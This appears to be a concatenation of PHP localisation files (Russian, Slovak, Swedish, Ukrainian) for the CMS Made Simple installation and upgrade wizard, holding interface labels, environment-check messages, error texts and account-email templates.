$lang['step3_passed'] = 'Этот пакет выполнил многочисленные тесты вашей среды PHP, и все они прошли. Это отличная новость! Хотя это не всеобъемлющий тест, вам не составит труда запустить базовую установку CMSMS.';
$lang['step9_get_help'] = 'Свяжитесь с другими разработчиками CMSMS и получите помощь следующими способами';
$lang['step9_get_support'] = 'Каналы поддержки';
$lang['step9_join_community'] = 'Присоединяйтесь к нашему сообществу';
$lang['step9_love_cmsms'] = 'Нравиться CMS Made Simple ?';
$lang['step9_removethis'] = '<strong> Предупреждение </strong>. Из соображений безопасности важно удалить помощника по установке с вашего сайта для просмотра, как только вы подтвердите, что операция выполнена успешно.';
$lang['step9_support_us'] = 'Нажмите здесь, чтобы узнать, как вы можете поддержать нас';
$lang['symbol'] = 'Символ';
$lang['social_message'] = 'Я успешно установил CMS Made Simple!';
$lang['test_failed'] = 'Не удалось выполнить требуемый тест';
$lang['test_passed'] = 'Тест прошел <em> (прошедшие тесты отображаются только в расширенном режиме) </em>';
$lang['test_warning'] = 'Настройка выше требуемого значения, но ниже рекомендуемого значения или ... <br /> Возможность, которая может потребоваться для некоторых дополнительных функций, недоступна';
$lang['th_status'] = 'Статус';
$lang['th_testname'] = 'Тест';
$lang['th_value'] = 'Значение';
$lang['title_error'] = 'Хьюстон у нас проблема!';
$lang['title_step2'] = 'Шаг 2 - Обнаружение существующего ПО';
$lang['title_step3'] = 'Шаг 3 - Тесты';
$lang['title_step4'] = 'Шаг 4 - Основная информация о конфигурации';
$lang['title_step5'] = 'Шаг 5 - Информация об учетной записи администратора';
$lang['title_step6'] = 'Шаг 6 - Настройки сайта';
$lang['title_step7'] = 'Шаг 7 - Установка файлов приложений';
$lang['title_step8'] = 'Шаг 8 - Работа с базой данных';
$lang['title_step9'] = 'Шаг 9 - Завершение';
$lang['title_welcome'] = 'Добро пожаловать';
$lang['title_forum'] = 'Форум поддержки';
$lang['title_docs'] = 'Официальная документация';
$lang['title_api_docs'] = 'Официальная документация API';
$lang['to'] = 'в';
$lang['title_share'] = 'Поделитесь своим опытом с друзьями.';
$lang['tmpfile'] = 'Проверка работы tmpfile ()';
$lang['tmp_dirs_empty'] = 'Убедитесь, что временные каталоги пусты или не существуют.';
$lang['upgrade'] = 'Обновить';
$lang['upgrade_deleteoldevents'] = 'Удаление старых событий';
$lang['upgrading_schema'] = 'Обновление схемы базы данных';
$lang['upload_max_filesize'] = 'Проверка максимального размера загруженных файлов';
$lang['username'] = 'Имя пользователя';
$lang['warn_disable_functions'] = 'Примечание. Одна или несколько основных функций PHP отключены. Это может негативно сказаться на вашей установке CMSMS, особенно на сторонних расширениях. Следите за журналом ошибок. Ваши отключенные функции: <br/> <br/> %s';
$lang['warn_max_execution_time'] = 'Хотя максимальное время выполнения %s соответствует или превышает минимальное значение %s, мы рекомендуем вам увеличить его до %s или выше';
$lang['warn_memory_limit'] = 'Предельное значение вашей памяти составляет  %s, что выше минимума %s. Однако рекомендуется %s';
$lang['warn_open_basedir'] = 'open_basedir включен в вашей конфигурации php. Хотя вы можете продолжить, CMSMS не будет поддерживать установки с ограничениями open_basedir.';
$lang['warn_post_max_size'] = 'Максимальное значение вашего post max равно %s, что выше минимального %s, однако рекомендуется %s. Кроме того, убедитесь, что это значение больше, чем upload_max_filesize';
$lang['warn_tests'] = '<strong> Примечание. </strong> прохождение всех этих тестов должно гарантировать, что CMSMS функционирует правильно для большинства сайтов. Однако по мере роста сайта и увеличения функциональности эти минимальные значения могут стать недостаточными. Кроме того, у сторонних модулей могут быть дополнительные требования к правильной работе';
$lang['warn_upload_max_filesize'] = 'Хотя вашей настройки %s достаточно, рекомендуется увеличить значение параметра upload_max_filesize в PHP, по крайней мере, %s';
$lang['welcome_message'] = 'Добро пожаловать! Это механизм автоматической установки CMS Made Simple. 
Этот пакет позволит вам быстро и легко подтвердить, что ваш хостинг совместим с CMSMS, и установить или обновить до последней версии CMS Made Simple. Процедура установки вам обязательно понравится!';
$lang['wizard_step1'] = 'Добро пожаловать';
$lang['wizard_step2'] = 'Обнаружение существующего программного обеспечения';
$lang['wizard_step3'] = 'Тесты совместимости';
$lang['wizard_step4'] = 'Информация о конфигурации';
$lang['wizard_step5'] = 'Информация об учетной записи администратора';
$lang['wizard_step6'] = 'Настройки сайта';
$lang['wizard_step7'] = 'Файлы';
$lang['wizard_step8'] = 'Работа в базе данных';
$lang['wizard_step9'] = 'Завершено';
$lang['xml_functions'] = 'Проверка функциональности XML';
$lang['yes'] = 'Да';
$lang['ga'] = 'GA1.2.1505228635.1539520636';
$lang['gid'] = 'GA1.2.272944334.1647665194';
?><?php
$lang['action_freshen'] = 'Obnovuje/opravuje sa inštalácia CMSMS';
$lang['action_install'] = 'Vytváranie novej stránky CMSMS %s';
$lang['action_upgrade'] = 'Aktualizovanie webovej stránky CMSMS na verziu %s';
$lang['advanced_mode'] = 'Zapnúť pokročilý režim';
$lang['apptitle'] = 'Asistent inštaláciou a aktualizáciou';
$lang['available_languages'] = 'Dostupné jazyky';
$lang['build_date'] = 'Dátum zostavenia';
$lang['changelog_uc'] = 'ZOZNAM ZMIEN';
$lang['cleaning_files'] = 'Prebieha čistenie súborov, ktoré nie sú pre toto vydanie použiteľné';
$lang['config_writable'] = 'Kontrola možnosti zápisu do konfiguračného súboru';
$lang['confirm_freshen'] = 'Naozaj chcete obnoviť (opraviť) existujúcu inštaláciu CMSMS? Používajte mimoriadne opatrne!';
$lang['confirm_upgrade'] = 'Naozaj chcete spustiť proces aktualizovania?';
$lang['curl_extension'] = 'Kontrolujte sa rozšírenie Curl';
$lang['database_support'] = 'Skontrolovať kompatibilitu ovládačov databázy';
$lang['desc_wizard_step1'] = 'Spustiť inštaláciu alebo proces aktualizácie';
$lang['desc_wizard_step2'] = 'Analyzovať cieľový priečinok a nájsť existujúci softvér';
$lang['desc_wizard_step3'] = 'Vyberte ak sa chcete uistiť, že je všetko v poriadku a je možné nainštalovať jadro CMSMS';
$lang['desc_wizard_step4'] = 'Pre nové inštalácie a úkony spojené s obnovou zadajte základné informácie o konfigurácii';
$lang['desc_wizard_step5'] = 'Pre nové inštalácie zadajte informáciu o účte administrátora';
$lang['desc_wizard_step6'] = 'Pre nové inštalácie zadajte niektoré základné podrobnosti o stránke';
$lang['desc_wizard_step7'] = 'Extrahovať súbory';
$lang['desc_wizard_step8'] = 'Vytvoriť alebo aktualizovať schému databázy, nastaviť počiatočné udalosti, oprávnenia, účty používateľov, šablóny, štýlopisy a obsah';
$lang['desc_wizard_step9'] = 'Nainštalovať a/alebo aktualizovať moduly podľa potreby, vykonať zápis do konfiguračného súboru a vyčistiť.';
$lang['destination_directory'] = 'Cieľový priečinok';
$lang['dest_writable'] = 'Zapísať oprávnenie do cieľového priečinka';
$lang['disable_functions'] = 'Kontrola zablokovaných funkcií';
$lang['done'] = 'hotovo';
$lang['email_accountinfo_message'] = 'Vaša inštalácia systému CMS Made Simple bola dokončená.

Tento e-mail obsahuje citlivé informácie a mal by byť uložený na bezpečnom mieste. 

Tu sú podrobnosti o Vašej novej inštalácii:
meno používateľa: %s
heslo: %s
inštalačný priečinok: %s
hlavná (koreňová) URL: %s';
$lang['email_accountinfo_message_exp'] = 'Vaša inštalácia CMS Made Simple je dokončená.

Tento e-mail obsahuje citlivé informácie a mal by byť uložený na bezpečnom mieste. 

Tu sú podrobnosti o Vašej novej inštalácii:
meno používateľa: %s
heslo: %s
inštalačný priečinok: %s';
$lang['email_accountinfo_subject'] = 'Inštalácia CMS Made Simple bola úspešná';
$lang['emailaccountinfo'] = 'Odoslať informáciu o účte e-mailom';
$lang['emailaddr'] = 'E-mailová adresa';
$lang['error_adminacct_emailaddr'] = 'E-mailová adresa, ktorú ste zadali, nie je platná';
$lang['error_adminacct_emailaddrrequired'] = 'Vybrali ste si odoslanie informácií o účte e-mailom, ale nezadali ste platnú e-mailovú adresu';
$lang['error_adminacct_password'] = 'Zadané heslo je neplatné (musí mať najmenej šesť znakov)';
$lang['error_adminacct_repeatpw'] = 'Zadané heslá sa nezhodujú';
$lang['error_adminacct_username'] = 'Zadané meno používateľa nie je platné. Skúste to ešte raz, prosím';
$lang['error_backupconfig'] = 'Nie je možné korektne zálohovať konfiguračný súbor';
$lang['error_checksum'] = 'Kontrolný súčet extrahovaného súboru nezodpovedá originálu';
$lang['error_cmstablesexist'] = 'Zdá sa, že na tejto databáze je už nainštalovaný systém CMS. Prosím zadajte odlišné informácie o databáze. Ak chcete použiť odlišný prefix tabuľky, možno bude potrebné reštartovať proces inštalácie a zapnúť pokročilý režim.';
$lang['error_createtable'] = 'Problém pri vytváraní databázovej tabuľky... pravdepodobne súvisí tento problém s oprávneniami';
$lang['error_dbconnect'] = 'Nemožno sa pripojiť k databáze. Prosím znovu skontrolujte prihlasovacie údaje, ktoré ste zadali';
$lang['error_dirnotvalid'] = 'Priečinok %s neexistuje (alebo nie je možné do neho zapisovať)';
$lang['error_droptable'] = 'Problém s preskočením databázovej tabuľky... pravdepodobne súvisí tento problém s oprávneniami';
$lang['error_filenotwritable'] = 'Súbor %s nebolo možné prepísať (problém s oprávneniami)';
$lang['error_internal'] = 'Prepáčte, niekde sa stala chyba... (interná chyba %s)';
$lang['error_invalid_directory'] = 'Zdá sa, že priečinok vybraný pre nainštalovanie  je pracovným priečinkom samotného inštalátora';
$lang['error_invalidconfig'] = 'Chyba v konfiguračnom súbore, alebo konfiguračný súbor chýba';
$lang['error_invaliddbpassword'] = 'Heslo k databáze obsahuje neplatné znaky, ktoré nie je možné bezpečne uložiť.';
$lang['error_invalidkey'] = 'Neplatná premenná člena alebo kľúča %s pre triedu %s';
$lang['error_invalidparam'] = 'Neplatný parameter alebo hodnota parametra: %s';
$lang['error_missingconfigvar'] = 'Kľúč "%squot; buď chýba alebo nie je v konfiguračnom súbore config.ini platný';
$lang['error_noarchive'] = 'Problém pri nájdení archívu... prosím vykonajte reštart';
$lang['error_nlsnotfound'] = 'Problém s nájdením NLS súborov v archíve';
$lang['error_nodatabases'] = 'Nepodarilo sa nájsť žiadne kompatibilné rozšírenia databázy';
$lang['error_nodbhost'] = 'Prosím zadajte platné meno hostiteľa (alebo IP adresu) pre pripojenie k databáze';
$lang['error_nodbname'] = 'Prosím zadajte názov platnej databázy na hostiteľovi uvedenom hore';
$lang['error_nodbpass'] = 'Prosím zadajte platné heslo pre overenie prihlásenia k databáze';
$lang['error_nodbprefix'] = 'Prosím zadajte platný prefix pre databázové tabuľky';
$lang['error_nodbtype'] = 'Prosím vyberte typ databázy';
$lang['error_nodbuser'] = 'Prosím zadajte platné meno používateľa pre prihlásenie k databáze';
$lang['error_nodestdir'] = 'Cieľový priečinok nie je nastavený';
$lang['error_nositename'] = 'Názov stránky (sitename) je povinný parameter. Prosím zadajte vhodný názov pre vašu stránku.';
$lang['error_notimezone'] = 'Prosím zadajte platnú časovú zónu pre tento server';
$lang['error_sendingmail'] = 'Chyba pri posielaní e-mailu';
$lang['error_tzlist'] = 'Pri preberaní zoznamu identifikátorov časovej zóny nastal nejaký problém.';
$lang['errorlevel_estrict'] = 'Kontrola voľby E_STRICT';
$lang['errorlevel_edeprecated'] = 'Kontrola voľby E_DEPRECATED';
$lang['fail_func_json'] = 'nenašla sa funkcionalita json';
$lang['fail_func_gzopen'] = 'nenašla sa funkcia gzopen';
$lang['fail_func_md5'] = 'nenašla sa funkcionalita md5';
$lang['fail_func_tempnam'] = 'Funkcia tempnam neexistuje. Je však nevyhnutná pre správne fungovanie CMSMS';
$lang['fail_ini_set'] = 'Zdá sa, že nemôžeme zmeniť nastavenia ini. Mohlo by to spôsobiť problémy v moduloch tretích strán (alebo pri zapnutí režimu ladenia)';
$lang['fail_magic_quotes_runtime'] = 'Zdá sa, že v konfigurácií sú zapnuté tzv. magické úvodzovky (magic quotes). Prosím vypnite túto voľbu a skúste to znovu';
$lang['fail_max_execution_time'] = 'Vami určený max. ččas vykonávania %s nezodpovedá minimálnej hodnote %s. Odporúčame vám zvýšenie na %s alebo viac';
$lang['fail_memory_limit'] = 'Vaša hodnota pre limit pamäte je príliš nízka. Je nastavených %s, avšak minimálne sa vyžaduje %s a odporúča sa %s';
$lang['fail_multibyte_support'] = 'Podpora multibyte nie je zapnutá v konfigurácii';
$lang['fail_output_buffering'] = 'Ukladanie výstupu do vyrovnávacej pamäte nie je zapnutá.';
$lang['fail_open_basedir'] = 'Sú aktívne obmedzenia Open basedir. CMSMS však vyžaduje ich deaktivovanie';
$lang['fail_php_version'] = 'Verzia PHP dostupná pre CMSMS je veľmi dôležitá. Minimálna akceptovaná verzia je %s, odporúčame však %s alebo vyššiu. Máte %s';
$lang['fail_post_max_size'] = 'Vaša max. veľkosť pre odosielanie (%s) nezodpovedá minimálnej hodnote %s. Odporúča sa hodnota %s alebo vyššia a zabezpečte, aby bola väčšia ako hodnota parametra upload_max_filesize';
$lang['fail_pwd_writable2'] = 'HTTP proces musí byť schopný zapisovať do cieľového priečinka (a do všetkých súborov a priečinkov v jeho okolí), aby bolo možné nainštalovať súbory. Momentálne však nie je dostupné oprávnenie na zápis (minimálne) do %s';
$lang['fail_register_globals'] = 'Prosím vypnite položku register globals vo vašej konfgurácii PHP';
$lang['fail_remote_url'] = 'Zaznamenali sme problémy pri pripájaní k vzdialenej URL adrese. Kvôli tomu sa obmedzí funkcionalita systému CMS Made Simple';
$lang['ini_set'] = 'Testovanie toho, či je možné zmeniť nastavenia INI';
$lang['install'] = 'Nainštalovať';
$lang['install_attachstylesheets'] = 'Pripojiť štýlopisy k témam';
$lang['install_backupconfig'] = 'Zálohovanie konfiguračného súboru';
$lang['install_created_index'] = 'Vytvorený index %s... %s';
$lang['install_create_tables'] = 'Vytvoriť databázové tabuľky';
$lang['install_createconfig'] = 'Vytvoriť nový konfiguračný súbor';
$lang['install_createcontentpages'] = 'Vytvoriť predvolené stránky s obsahom';
$lang['install_created_table'] = 'Vytvorená tabuľka %s: .... %s';
$lang['install_createtablesindexes'] = 'Vytváranie tabuliek a indexov';
$lang['install_createtmpdirs'] = 'Vytvoriť dočasné priečinky';
$lang['install_creating_index'] = 'Vytvorený index %s';
$lang['install_default_collections'] = 'Nainštalovať predvolené kolekcie';
$lang['install_defaultcontent'] = 'Nainštalovať predvolený obsah';
$lang['install_detectlanguages'] = 'Detegovať nainštalované jazyky';
$lang['install_dropping_tables'] = 'Preskakovanie tabuliek';
$lang['install_dummyindexhtml'] = 'Vytváranie falošných súborov index.html';
$lang['install_extractfiles'] = 'Extrahovať súbory z archívu';
$lang['install_initevents'] = 'Vytvoriť udalosti';
$lang['install_initsitegroups'] = 'Vytvoriť počiatočné skupiny';
$lang['install_initsiteperms'] = 'Nastaviť počiatočné oprávnenia';
$lang['install_initsiteprefs'] = 'Nastaveniť počiatočné predvoľby stránky';
$lang['install_initsiteusers'] = 'Vytvoriť predvolený účet používateľa';
$lang['install_initsiteusertags'] = 'Počiatočné použivateľom definované tagy';
$lang['install_module'] = 'Nainštalovať modul %s';
$lang['install_modules'] = 'Nainštalovať dostupné moduly';
$lang['install_passwordsalt'] = 'Nastaviť salt pre heslo';
$lang['install_requireddata'] = 'Nastaviť počiatočné vyžadované údaje';
$lang['install_schema'] = 'Vytvoriť schému databázy';
$lang['install_setschemaver'] = 'Nastaviť verziu schémy';
$lang['install_setsequence'] = 'Reset sekvenčných tabuliek';
$lang['install_setsitename'] = 'Nastaviť názov stránky';
$lang['install_stylesheets'] = 'Vytvoriť predvolené štýlopisy';
$lang['install_templates'] = 'Vytvoriť predvolené šablóny';
$lang['install_templatetypes'] = 'Vytvoriť štandardné typy šablóny';
$lang['install_update_sequences'] = 'Aktualizovať sekvenčné tabuľky';
$lang['install_updatehierarchy'] = 'Aktualizovať pozície v hierarchii obsahu';
$lang['install_updateseq'] = 'Aktualizovať sekvenciu pre %s';
$lang['installer_ver'] = 'Verzia inštalátora';
$lang['legend'] = 'Legenda';
$lang['magic_quotes_runtime'] = 'Uistite sa, že sú vypnuté tzv. magické úvodzovky (magic quotes)';
$lang['max_execution_time'] = 'Kontrola maximálneho času vykonávania PHP skriptu';
$lang['meaning'] = 'Význam';
$lang['memory_limit'] = 'Kontrola dostatočného limitu pamäte pre PHP';
$lang['msg_clearedcache'] = 'Vyrovnávacia pamäť servera bola vyčistená';
$lang['msg_configsaved'] = 'Existujúci konfiguračný súbor bol uložený do %s';
$lang['msg_upgrade_module'] = 'Aktualizovanie modulu %s';
$lang['msg_upgrademodules'] = 'Aktualizovanie modulov';
$lang['msg_yourvalue'] = 'Máte: %s';
$lang['multibyte_support'] = 'Kontrola podpory multibyte';
$lang['next'] = 'Ďalej';
$lang['no'] = 'Nie';
$lang['none'] = 'Žiadne';
$lang['open_basedir'] = 'obmedzenia open_basedir';
$lang['open_basedir_session_save_path'] = 'voľba open_basedir je zapnutá. Nemožno otestovať cestu pre uloženie relácie.';
$lang['output_buffering'] = 'Uistite sa, že je zapnuté ukladanie výstupu do vyrovnávacej pamäte';
$lang['pass_config_writable'] = 'HTTP proces má oprávnenia na zápis do súboru config.php';
$lang['pass_database_support'] = 'Našiel sa minimálne jeden kompatibiliný ovládač databázy';
$lang['pass_func_json'] = 'detegovaná funkcionalita json';
$lang['pass_func_md5'] = 'bola detegovaná funkcionalita md5';
$lang['pass_func_tempnam'] = 'Funkcia tempnam existuje';
$lang['pass_multibyte_support'] = 'Zdá sa, že podpora multibyte je zapnutá';
$lang['pass_php_version'] = 'Aktuálne nakonfigurovaná verzia PHP nespĺňa minimálne požiadavky. Ako minimum je požadované PHP %s, aj keď odporúčame použitie verzie %s alebo vyššej';
$lang['pass_pwd_writable'] = 'HTTP proces môže zapisovať do cieľového priečinka. To je potrebné kvôli extrahovaniu súborov';
$lang['password'] = 'Heslo';
$lang['ph_sitename'] = 'Zadajte názov stránky';
$lang['php_version'] = 'Verzia PHP';
$lang['post_max_size'] = 'Kontrola maximálneho množstva dát, ktoré môžu byť vložené v jednej požiadavke';
$lang['prompt_addlanguages'] = 'Ďalšie jazyky';
$lang['prompt_createtables'] = 'Vytvoriť databázové tabuľky';
$lang['prompt_dbhost'] = 'Názov hostiteľa databázy';
$lang['prompt_dbinfo'] = 'Informácia o databáze';
$lang['prompt_dbname'] = 'Názov databázy';
$lang['prompt_dbpass'] = 'Heslo';
$lang['prompt_dbport'] = 'Číslo portu databázy';
$lang['prompt_dbprefix'] = 'Prefix názvu databázovej tabuľky';
$lang['prompt_dbtype'] = 'Typ databázy';
$lang['prompt_dbuser'] = 'Meno používateľa';
$lang['prompt_dir'] = 'Inštalačný priečinok';
$lang['prompt_installcontent'] = 'Nainštalovať vzorový obsah';
$lang['prompt_queryvar'] = 'Premenná pre dopyt';
$lang['prompt_sitename'] = 'Názov webovej stránky';
$lang['prompt_timezone'] = 'Časová zóna servera';
$lang['pwd_writable'] = 'Priečinok: zapisovateľný';
$lang['readme_uc'] = 'README';
$lang['remote_url'] = 'Test, či je možné nadviazať odchádzajúce HTTP spojenia';
$lang['repeatpw'] = 'Zopakovať heslo';
$lang['reset_site_preferences'] = 'Reset niektorých preferencií stránky';
$lang['reset_user_settings'] = 'Reset používateľských nastavení';
$lang['retry'] = 'Zopakovať';
$lang['saltpasswords'] = 'Salt hesiel';
$lang['session_save_path_exists'] = 'Session_save_path existuje';
$lang['session_save_path_writable'] = 'Session_save_path je zapisovateľná';
$lang['session_use_cookies'] = 'Zabezpečiť, aby relácie PHP používali cookies';
$lang['sometests_failed'] = 'Vykonali sme mnoho testov vášho aktuálneho webového prostredia. Nenašli sa žiadne kritické problémy, pred pokračovaním však odporúčame opraviť nasledujúce položky.';
$lang['step1_advanced'] = 'Pokročilý režim';
$lang['step1_destdir'] = 'Výber priečinka';
$lang['th_status'] = 'Stav';
$lang['th_testname'] = 'Test';
$lang['th_value'] = 'Hodnota';
$lang['title_error'] = 'Houston, máme problém!';
$lang['title_step2'] = 'Krok 2 – Detekcia existujúceho softvéru';
$lang['title_step3'] = 'Krok 3 – Testy';
$lang['title_step4'] = 'Krok 4 – Základné informácie o konfigurácii';
$lang['title_step5'] = 'Krok 5 – Informácia o účte administrátora';
$lang['title_step6'] = 'Krok 6 – Nastavenia stránky';
$lang['title_step7'] = 'Krok 7 – Nainštalovať súbory aplikácie';
$lang['title_step8'] = 'Krok 8 – Fungovanie databázy';
$lang['title_step9'] = 'Krok 9 – Dokončenie';
$lang['title_welcome'] = 'Vitajte';
$lang['title_forum'] = 'Fórum pre podporu';
$lang['title_docs'] = 'Oficiálna dokumentácia';
$lang['title_api_docs'] = 'Oficiálna dokumentácia API';
$lang['to'] = 'pre';
$lang['title_share'] = 'Podeľte sa o váš dojem so svojimi priateľmi';
$lang['tmpfile'] = 'Kontrola fungujúceho tmpfile()';
$lang['upgrade'] = 'Aktualizácia';
$lang['upgrade_deleteoldevents'] = 'Vymazávanie starších udalostí';
$lang['upgrading_schema'] = 'Aktualizovanie schémy databázy';
$lang['upload_max_filesize'] = 'Kontrola maximálnej veľkosti odosielaných súborov';
$lang['username'] = 'Meno používateľa';
$lang['wizard_step1'] = 'Vitajte';
$lang['wizard_step2'] = 'Detekcia existujúceho softvéru';
$lang['wizard_step3'] = 'Testy kompatibility';
$lang['wizard_step4'] = 'Konfiguračná informácia';
$lang['wizard_step5'] = 'Informácia o účte administrátora';
$lang['wizard_step6'] = 'Nastavenia stránky';
$lang['wizard_step7'] = 'Súbory';
$lang['wizard_step8'] = 'Fungovanie databázy';
$lang['wizard_step9'] = 'Dokončiť';
$lang['xml_functions'] = 'Kontrola XML funkcionality';
$lang['yes'] = 'Áno';
?><?php
$lang['advanced_mode'] = 'Aktivera avancerade inställningar';
$lang['available_languages'] = 'Tillgängliga språk';
$lang['cleaning_files'] = 'Rensar bort filer som inte längre behövs i den här utgåvan';
$lang['config_writable'] = 'Kontrollerar skrivbarhet för configurationsfilen';
$lang['confirm_freshen'] = 'Är du säker på att du vill uppgradera (reparera) den existerande installationen av CMSMS? Gå endast vidare om du är säker!';
$lang['confirm_upgrade'] = 'Är du säker på att du vill påbörja uppgraderingsprocessen?';
$lang['done'] = 'färdig';
$lang['email_accountinfo_message'] = 'Din installation av CMS Made Simple är slutförd.

Detta meddelande innehåller känslig information och bör hanteras/lagras på ett säkert sätt.

Detaljer för din installation:
Användarnamn: %s
Lösenord: %s
Installationsmapp: %s
Root URL: %s';
$lang['email_accountinfo_message_exp'] = 'Din installation av CMS Made Simple är slutförd.

Detta meddelande innehåller känslig information och bör hanteras/lagras på ett säkert sätt.

Detaljer för din installation:
Användarnamn: %s
Lösenord: %s
Installationsmapp: %s';
$lang['title_step2'] = 'Steg 2 - Söker befintliga program';
$lang['title_step3'] = 'Steg 3 - Tester';
$lang['title_step4'] = 'Steg 4 - Grundläggande konfiguration';
$lang['title_step5'] = 'Steg 5 - Administratörskontot';
$lang['title_step6'] = 'Steg 6 - Webbplatsinställningar';
$lang['title_step7'] = 'Steg 7 - Installation av programfiler';
$lang['title_step8'] = 'Steg 8 - Databasinställningar';
$lang['title_step9'] = 'Steg 9 - Slutför';
$lang['title_welcome'] = 'Välkommen';
$lang['title_forum'] = 'Supportforum';
$lang['title_docs'] = 'Officiell dokumentation';
$lang['title_api_docs'] = 'Officiell API-dokumentation';
$lang['to'] = 'till';
$lang['title_share'] = 'Dela dina erfarenheter med dina vänner.';
$lang['wizard_step1'] = 'Välkommen';
$lang['yes'] = 'Ja';
?><?php
$lang['action_freshen'] = 'Поновлення/полагодження встановленої системи %s CMSMS';
$lang['action_install'] = 'Створення нового веб-сайту %s CMSMS';
$lang['action_upgrade'] = 'Оновлення веб-сайту CMSMS до версії %s';
$lang['advanced_mode'] = 'Увімкнути розширений режим';
$lang['apptitle'] = 'Помічник інсталяції та оновлення';
$lang['assets_dir_exists'] = 'Тека Assets існує';
$lang['available_languages'] = 'Доступні мови';
$lang['build_date'] = 'Дата збірки';
$lang['changelog_uc'] = 'Журнал змін';
$lang['cleaning_files'] = 'Очищення файлів, які більше не застосовуються для даної версії';
$lang['config_writable'] = 'Перевірте, чи файл конфігурації доступний для запису';
$lang['confirm_freshen'] = 'Ви впевнені, що хочете поновити (полагодити) існуючу встановлену систему CMSMS? Будьте особливо обережні!';
$lang['confirm_upgrade'] = 'Ви впевнені, що хочете почати процес оновлення';
$lang['curl_extension'] = 'Перевірка наявності розширень Curl';
$lang['create_assets_structure'] = 'Створення локації для файлів ресурсів';
$lang['database_support'] = 'Перевірити наявність сумісних драйверів бази даних';
$lang['desc_wizard_step1'] = 'Почати процес встановлення або оновлення';
$lang['desc_wizard_step2'] = 'Аналізувати теку призначення, щоб знайти існуюче програмне забезпечення';
$lang['desc_wizard_step3'] = 'Переконайтеся, що все є в порядку, щоб встановити ядро CMSMS';
$lang['desc_wizard_step4'] = 'Для нових інсталяцій та операцій поновлення, введіть базові налаштування';
$lang['desc_wizard_step5'] = 'Для нових інсталяцій, введіть інформацію про обліковий запис адміністратора';
$lang['desc_wizard_step6'] = 'Для нових інсталяцій, введіть базову інформацю про сайт';
$lang['desc_wizard_step7'] = 'Розпакувати файли';
$lang['desc_wizard_step8'] = 'Створити або оновити схему бази даних, встановити початкові події, дозволи, облікові записи користувачів, шаблони, таблиці стилів та вміст';
$lang['desc_wizard_step9'] = 'Інсталяція та/або оновлення модулів у разі потреби, запис файлу конфігурації та очистка.';
$lang['destination_directory'] = 'Тека призначення';
$lang['dest_writable'] = 'Дозвіл для запису у теці призначення';
$lang['disable_functions'] = 'Перевірка вимкнених функцій';
$lang['done'] = 'Завершено';
$lang['email_accountinfo_message'] = 'Інсталяцію CMS Made Simple завершено.

Цей електронний лист містить конфіденційну інформацію та повинен зберігатися в безпечному місці.

Ось деталі вашої встановленої системи.
ім\'я користувача: %s
пароль: %s
тека, до якої інстальовано: %s
коренева URL-адреса: %s';
$lang['email_accountinfo_message_exp'] = 'Інсталяцію CMS Made Simple завершено.

Цей електронний лист містить конфіденційну інформацію та повинен зберігатися в безпечному місці.

Ось деталі вашої встановленої системи.
ім\'я користувача: %s
пароль: %s
тека, до якої інстальовано: %s';
$lang['email_accountinfo_subject'] = 'CMS Made Simple успішно встановлено';
$lang['emailaccountinfo'] = 'Надіслати на електронну пошту інформацію про обліковий запис';
$lang['emailaddr'] = 'Адреса електронної пошти';
$lang['error_adminacct_emailaddr'] = 'Вказана адреса електронної пошти недійсна';
$lang['error_adminacct_emailaddrrequired'] = 'Ви обрали отримання інформації про обліковий запис електронною поштою, але не ввели дійсну адресу електронної пошти';
$lang['error_adminacct_password'] = 'Вказаний пароль недійсний (повинен містити принаймні шість символів)';
$lang['error_adminacct_repeatpw'] = 'Введені паролі не збігаються.';
$lang['error_adminacct_username'] = 'Вказане ім\'я користувача недійсне. Будь ласка, спробуйте ще раз';
$lang['error_admindirrenamed'] = 'Вірогідно, що ви з міркувань безпеки перейменували свою адмін. теку CMSMS. Вам потрібно буде перейменувати її назад <a href="https://docs.cmsmadesimple.org/general-information/securing-cmsms#renaming-admin-folder" target="_blank" class="external">(детальніше)</a>, щоб продовжити!<br/><br/>Після повернення назви адмін. теки до її оригінальної назви, перезавантажте цю сторінку.';
$lang['error_backupconfig'] = 'Ми не змогли належним чином створити резервну копію файлу конфігурації';
$lang['error_checksum'] = 'Контрольна сума файлу не відповідає оригіналу';
$lang['error_cmstablesexist'] = 'Схоже, що в цій базі даних вже встановлена система CMS. Будь ласка, вкажіть іншу базу даних. Якщо ви хочете використовувати інший префікс таблиць, можливо, доведеться перезапустити процес інсталяції та увімкнути розширений режим.';
$lang['error_createtable'] = 'Проблема зі створенням таблиці бази даних ... можливо, проблема з правами доступу користувача бази даних';
$lang['error_dbconnect'] = 'Не вдалося підключитися до бази даних. Будь ласка, перевірте ще раз введені вами дані';
$lang['error_dirnotvalid'] = 'Тека %s не існує (або не доступна для запису)';
$lang['error_droptable'] = 'Проблема зі знищенням таблиці бази даних ... можливо, проблема з правами доступу користувача бази даних';
$lang['error_filenotwritable'] = 'Неможливо перезаписати файл %s (проблема з правами доступу)';
$lang['error_internal'] = 'Вибачте, щось пішло не так ... (внутрішня помилка) (%s)';
$lang['error_invalid_directory'] = 'Схоже, що тека, в яку ви хочете інсталювати, є робочою текою самого інсталятора';
$lang['error_invalidconfig'] = 'Помилка в файлі конфігурації або файл конфігурації відсутній';
$lang['error_invaliddbpassword'] = 'Пароль бази даних містить невірні символи, які не можуть бути безпечно збережені.';
$lang['error_invalidkey'] = 'Недійсна змінна або ключ %s для класу %s';
$lang['error_invalidparam'] = 'Недійсний параметр або його значення: %s';
$lang['error_invalidtimezone'] = 'Неправильно вказаний часовий пояс';
$lang['error_invalidqueryvar'] = 'Введена змінна запиту містить недійсні символи. Будь ласка, використовуйте лише буквено-цифрові символи та знаки підкреслення.';
$lang['error_missingconfigvar'] = 'Ключ "%s" відсутній або недійсний у файлі config.ini';
$lang['error_noarchive'] = 'Проблема з пошуком архіву ... будь ласка, перезапустіть процес';
$lang['error_nlsnotfound'] = 'Проблема з пошуком файлів NLS в архіві';
$lang['error_nodatabases'] = 'Не знайдено сумісних розширень бази даних';
$lang['error_nodbhost'] = 'Будь ласка, введіть дійсне ім\'я хоста (або IP-адресу) для з\'єднання з базою даних';
$lang['error_nodbname'] = 'Будь ласка, введіть назву дійсної бази даних на сервері, зазначеному вище';
$lang['error_nodbpass'] = 'Будь ласка, введіть дійсний пароль для аутентифікації в базі даних';
$lang['error_nodbprefix'] = 'Будь ласка, введіть дійсний префікс для таблиць бази даних';
$lang['error_nodbtype'] = 'Будь ласка, виберіть тип бази даних';
$lang['error_nodbuser'] = 'Будь ласка, введіть дійсне ім\'я користувача для аутентифікації в базі даних';
$lang['error_nodestdir'] = 'Теку призначення не встановлено';
